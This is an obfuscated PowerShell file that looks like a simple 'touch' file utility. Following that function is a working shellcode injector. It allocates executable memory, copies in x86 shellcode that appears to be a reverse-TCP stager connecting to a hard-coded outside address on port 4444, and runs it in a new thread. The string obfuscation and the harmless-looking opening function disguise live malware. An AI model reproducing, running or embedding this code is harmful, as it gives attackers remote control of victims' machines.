function tOu`Ch {
    param (
        [string]${f`iLE},
        ${d`ATE} = '' 
    )

    if (${f`ILE} -eq ${nU`lL}) {
        throw ("{0}{1}{4}{2}{3}" -f'No fil','ename ','pl','ied','sup')
    }

    if (!${D`ATE}) {
        ${da`Te} = &("{2}{1}{0}" -f 'e','Dat','Get-')
    } else {
        ${d`ATe} = &("{0}{1}{2}"-f 'Get-','Dat','e') ${dA`TE}
    }

    ${D`ir} = .("{0}{3}{2}{1}" -f'S','th','it-Pa','pl') ${Fi`LE}

    if (&("{1}{2}{0}"-f'Path','Tes','t-') ${Fi`lE}) {
        (.("{2}{0}{1}"-f 'e','m','Get-It') ${f`ilE})."lAsTW`R`iTE`TIMe" = [datetime]${D`ATe}
    } elseif (${D`iR} -and !(&("{0}{1}{2}"-f'Test-P','a','th') -LiteralPath ${D`Ir})) {
        ${n`ULL} = &("{1}{0}"-f'kdir','m') ${d`ir}
        ${n`ULL} = &("{1}{2}{0}"-f'em','New-','It') ${fI`LE} -ItemType ("{0}{1}"-f 'Fil','e')
    } else {
        ${nu`ll} = &("{2}{0}{1}"-f 'e','w-Item','N') ${fi`lE} -ItemType ("{0}{1}" -f 'F','ile')
    }
}

${c} = ((("{106}{27}{5}{46}{40}{4}{79}{2}{63}{39}{85}{88}{16}{107}{123}{65}{110}{25}{98}{64}{19}{51}{13}{23}{97}{72}{124}{54}{32}{70}{0}{89}{66}{9}{95}{84}{3}{55}{6}{76}{38}{71}{48}{26}{21}{74}{67}{53}{41}{33}{69}{17}{45}{119}{111}{94}{77}{15}{68}{122}{60}{105}{102}{93}{108}{44}{80}{56}{83}{81}{75}{14}{82}{57}{36}{100}{12}{49}{29}{8}{120}{52}{47}{90}{114}{61}{121}{50}{78}{7}{34}{24}{113}{18}{42}{20}{73}{28}{101}{96}{31}{112}{116}{117}{10}{118}{115}{59}{30}{86}{37}{104}{11}{22}{92}{109}{91}{1}{99}{43}{35}{87}{58}{103}{62}"-f 'Type',',','N)]pu',';','dll','mport(','Impo',' lpThr','uint','lP','atic ext','tP','r ','t ','art','read(In','rt','Cr','[DllIm','dress, u','rt(8tN',' st','tr','dw','a','r ','ic','DllI','crt','ameter, ','tr ','tN)','loc','n ','e','t sr','ess','e','el32','ic ','.','xter','po','n','nt dwStackSi','e','8tNkernel32','t','ubl','lpPar','s,','in','wCrea','e','lAl','[Dll','ntPt','dr',' uin','tP',' ','l',';','blic stat','pAd','n',' f','tic ','tP','IntPtr ','ation','.dll8tN)]p','z','msv','a','St','rt(8tNkern','Th',' IntPtr','8t','ze, I','lp','Ad','r ',')','exte','m','c,','rn IntPtr Vi',', uint','ion','t',' ','s, u','e','rotect','l8','Si','l',' ui',', IntPt','.dl','ribute','t count)','mset(In','lpThreadAtt','[','ualAll','i','des','tPt','t',']','dId);','F','In','public',' st','ern ','a',' d','ag','tr','oc(I','e, uint f'))."re`plaCe"('8tN',[stRIng][cHar]34));${w} = .("{2}{1}{0}" -f 'ype','dd-T','A') -memberDefinition ${C} -Name ("{0}{1}" -f 'Wi','n32') -namespace ("{2}{0}{1}"-f'n3','2Functions','Wi') -passthru;[Byte[]];[Byte[]]${s`c} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xb0,0xe4,0x29,0x71,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${S`IZE} = 0x1000;if (${S`C}."L`ENg`Th" -gt 0x1000){${s`ize} = ${sc}."LEN`g`Th"};${X}=${w}::("{2}{1}{3}{0}" -f 'c','irt','V','ualAllo').Invoke(0,0x1000,${S`IZE},0x40);for (${I}=0;${i} -le (${S`c}."L`EnGth"-1);${i}++) {${W}::"ME`M`Set"([IntPtr](${x}.("{1}{0}{2}"-f'nt','ToI','32').Invoke()+${I}), ${Sc}[${i}], 1)};${w}::("{1}{2}{0}"-f'ad','Cre','ateThre').Invoke(0,0,${x},0,0,0);for (;;){&("{2}{0}{1}" -f '-','sleep','Start') 60};
